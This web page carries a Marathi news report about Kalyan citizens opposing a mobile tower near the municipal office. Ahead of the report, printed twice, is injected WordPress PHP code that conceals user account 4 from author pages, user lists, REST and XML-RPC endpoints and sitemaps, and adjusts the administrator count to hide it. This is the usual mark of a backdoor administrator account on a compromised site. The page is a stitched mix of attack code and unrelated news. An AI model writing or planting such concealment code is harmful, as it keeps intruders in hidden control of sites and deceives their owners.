add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 4;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 4;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 4;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 4;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 4;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 4;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
कल्याणमध्ये मोबाईल टॉवरला नागरिकांचा विरोध; निर्णयाचा पुनर्विचार करण्याची मागणी - crimeaala.com
दि.१ (कल्याण ): कल्याण डोंबिवली महानगरपालिका कार्यालयासमोरील शंकरराव चौक येथील वाहतूक बेटावर प्रस्तावित मोबाईल टॉवर उभारणीच्या निर्णयाविरोधात स्थानिक नागरिकांनी तीव्र हरकती नोंदवल्या आहेत. सामाजिक कार्यकर्ते वल्ली एस. राजन यांनी याबाबत आयुक्त अभिजीत गोयल यांना निवेदन सादर करून निर्णयाचा तातडीने पुनर्विचार करण्याची मागणी केली आहे.
निवेदनात नमूद केल्याप्रमाणे, मोबाईल टॉवर उभारणीसाठी महापालिकेची अधिकृत मंजुरी, राज्य शासनाची परवानगी तसेच Department of Telecommunications आणि Telecom Regulatory Authority of India यांच्या नियमांचे पालन अनिवार्य आहे. याशिवाय EMF Radiation Norms, सार्वजनिक सुरक्षितता, अर्बन प्लॅनिंग आणि रोड सेफ्टीच्या निकषांचे काटेकोर पालन झाले आहे का, याबाबत नागरिकांनी शंका व्यक्त केली आहे.
सदर ठिकाणाच्या परिसरात शाळा, निवासी वस्ती तसेच ज्येष्ठ नागरिकांची लक्षणीय संख्या असल्याने मोबाईल टॉवरमधून निर्माण होणाऱ्या विद्युतचुंबकीय किरणोत्सर्गाच्या (EMF) संभाव्य परिणामांबाबत चिंता व्यक्त करण्यात आली आहे. विविध अभ्यासांचा दाखला देत डोकेदुखी, झोपेचे विकार, थकवा, चक्कर येणे, स्मरणशक्तीवर परिणाम तसेच हृदयविकाराशी संबंधित तक्रारी उद्भवू शकतात, अशी भीती व्यक्त करण्यात आली आहे. विशेषतः शालेय विद्यार्थी व ज्येष्ठ नागरिकांवर त्याचा अधिक परिणाम होऊ शकतो, असे निवेदनात नमूद आहे.
महानगरपालिका ही नागरिकांच्या आरोग्य व सुरक्षिततेची जबाबदार संस्था असल्याने संबंधित परवानगी सर्व नियम व निकष पूर्ण करूनच देण्यात आली आहे का, याची सखोल चौकशी करावी. आवश्यक असल्यास संबंधित कंपनीस दिलेली परवानगी रद्द करून पर्यायी व सुरक्षित ठिकाण निश्चित करावे, अशी मागणीही करण्यात आली आहे.
दरम्यान, प्रशासनाने नागरिकांच्या भावना लक्षात घेऊन आरोग्य व सुरक्षिततेला प्राधान्य देत योग्य तो निर्णय घ्यावा, अशी अपेक्षा व्यक्त होत आहे.